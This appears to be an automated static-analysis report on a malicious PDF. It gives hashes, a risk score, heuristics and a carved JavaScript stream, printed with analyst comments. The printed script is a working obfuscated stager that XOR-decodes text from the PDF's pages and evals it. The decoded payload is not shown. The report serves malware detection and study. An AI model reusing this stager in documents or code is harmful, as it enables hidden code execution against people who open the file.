Malicious PDF — malware analysis report

Static analysis result for SHA-256 807b5c9d169bf21a…

MALICIOUS

PDF

5.6 KB Authoring application: Jidagelageno (via 767e7Ylojoppekaxopqi) First seen: 2026-05-08
MD5: 560fb2c6ab203894d7c5a6e4ecfae42b SHA-1: 3c37ee1256d27c7cf5556a745be44655744f815c SHA-256: 807b5c9d169bf21a31883e8c953532a9ac8ec6d836f2668f42bc93c1a5ebb880
86 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1566.001 Spearphishing Attachment

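The PDF file contains obfuscated JavaScript, identified as a stager by the high-severity page-word XOR heuristic and scored malicious by the classifier. The script attempts to deobfuscate and execute code that it reads from the document's page text, likely to download and run a second-stage payload. The JavaScript action and the embedded JS stream are low-severity findings on their own, since both are common in benign forms; it is their combination with the eval-based decoding stager that indicates malicious intent, consistent with a spearphishing attachment.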

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 3

  • Page-word XOR JavaScript eval stager high PDF_PAGE_WORD_XOR_EVAL_STAGER
    PDF JavaScript enumerates rendered page words with getPageNthWord/getPageNumWords, extracts encoded byte fragments, XOR-decodes the stage with char-code helpers, and evals the result. This is an old exploit-kit staging pattern and is not normal document JavaScript.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0008_000.js pdf-javascript-stream PDF /JS object 8 at offset 0xF52 1346 bytes
SHA-256: c510f8c6a5031d17c6606a6a4e88ede1c3452bf51c2d06efb7ba03d3692fec56
Preview script
First 1,000 lines of the extracted script
// Analyst note: string setup for the carved PDF script.
// rM is the empty string; the top-level xQN[cZ](yL, rM) call further down uses it as the
// replacement text when the filler characters are stripped from xQN.
var rM='';
// "length" assembled from two fragments, presumably to keep the plain name out of the
// script text. n is not referenced again in this listing.
var n=String("leng"+"th");
// Analyst note: fCP returns xQ+kDU after assigning an undeclared variable (jQ) and
// setting and incrementing a counter on `this` (lG). Nothing in this listing calls it,
// so it is presumably filler that pads the script rather than part of the decode path.
function fCP(xQ,kDU){jQ=["vE","qDG","cT"];this.lG=32766;this.lG++; return xQ+kDU};
// Analyst note: this run builds the obfuscation helpers and the encoded stage source.
// yL matches the filler characters q, 4, $, 9, L and R (global flag). They are scattered
// through xQN below and removed by the replace call at the end of this run.
var yL=/[q4\$9LR]/g;
// "prototype" assembled from fragments; lS is not referenced again in this listing.
var lS="pro"+"tot"+"ype";
// String object wrapping "eval", assembled from fragments; hE uses it as a property key.
var yR=new String("eva"+"l");
// "replace" assembled from fragments; used as the method name in xQN[cZ](...) below.
var cZ="rep"+"lac"+"e";
// xQN holds the stage source with filler characters mixed in. With the yL characters
// removed, the string names getPageNumWords, getPageNthWord, pageNum, substr, join,
// toString, length and eval, and reads as follows: concatenate the words of the page
// given by pageNum, walk the text two characters at a time, parse each pair as base 16
// (rSB=16), XOR it with jW (83), turn each result into a character through app's eval
// member, join the characters, keep the last nCF (332) characters in yN.cZM, and pass
// the rest to app's eval member. The trailing catch block is empty, so failures are silent.
// NOTE(review): the encoded payload is therefore in the PDF page text, not in this /JS
// stream; what the decoded stage does cannot be determined from this listing alone.
var xQN="varq yN=tRhis.jq;tr$y {fOq={yNO:\'eval\',sX:\'getPageN9thWord\',lW:\'s$uLbstr\',uVQR:\'pag4eNum\',eH:\'length\',xO:\'getPa9geNum4Words\',mD:\'join\'};rSB=16;jW = 83 ;kN=q0;uN=[];nCF=332;eN=L\'toStriRng\';cB=2;rM=\'\';tS9=\'\\\\x\';nC=String;fE=\'\';eD=\'\';iZC=1;;u4VY=yN[fO.xO](yN[fO.uVQ]);for(oTR=4kqN$;oT<u9VY;oT++){var mT=yN[fO.sX](yN[fO.uVQ],oT,iZC);eD=[eD,mT][fO.mD](9rM);;}for4(oT=k$Nq;oT<eD[fOq.eH];oT+=qcB){t=eD[$fO.lW$](oT,cB);rC=parseInLt(t,rSB);aH=r4C^jW;lC=aH[LeN](rSB);lC=(lCR[fO.e9H]==iZC)?R\'0\'R+lC9:lC;app[fRO.yNOq](\'yP=(\"\'+tS+lCL+\'\");\');uqN9.push(yP);}fER=$uN[fO.mD](rM);rLEH=fE[fO.eH]-nCF;yN.cZM=(fE[fO.lW](rEH));RyN.rY=(fE[fO.lW](kN,rqEH));app[fOq.yNO](yN.rY);} catch(fE){}";

;


// Strip the filler characters: equivalent to xQN.replace(yL, rM), where rM is ''.
xQN=xQN[cZ](yL, rM);

// rG captures the top-level `this`; it is later passed to hE as the object whose
// eval member is invoked.
var rG=this;
// cH is an undeclared counter that nothing else in this listing reads; presumably filler.
cH=5603;cH++;
function hE(kF,rY){lWX={fK:false}; var xY=this; var pE={iL:24712}; xY.uL=kF; var rQ=new String();var uLWX=["tW"]; xY.j=kF;  var bA=false;rAZ=["vSN"];oTI=["oZ"]; xY.j[yR](rY)};
// Analyst note: apart from the hE construction, the statements in this run set values
// that nothing else in this listing reads; they are presumably filler.
this.kB='';
this.eL=32343;this.eL++;
var tE=["sV","pM","uF"];this.mTW=2004;this.mTW-=75;
// kN is set to 0 here; the xQN string also assigns kN itself once its filler is stripped.
var kN=0;
;


// Execution point: constructing hE passes the already-stripped xQN string to the eval
// member of rG (the top-level `this`). The returned object bCD is not used afterwards.
var bCD=new hE(rG,xQN);
gP=4385;gP--;aT=22733;aT--;
var dC=false;hKV={};

;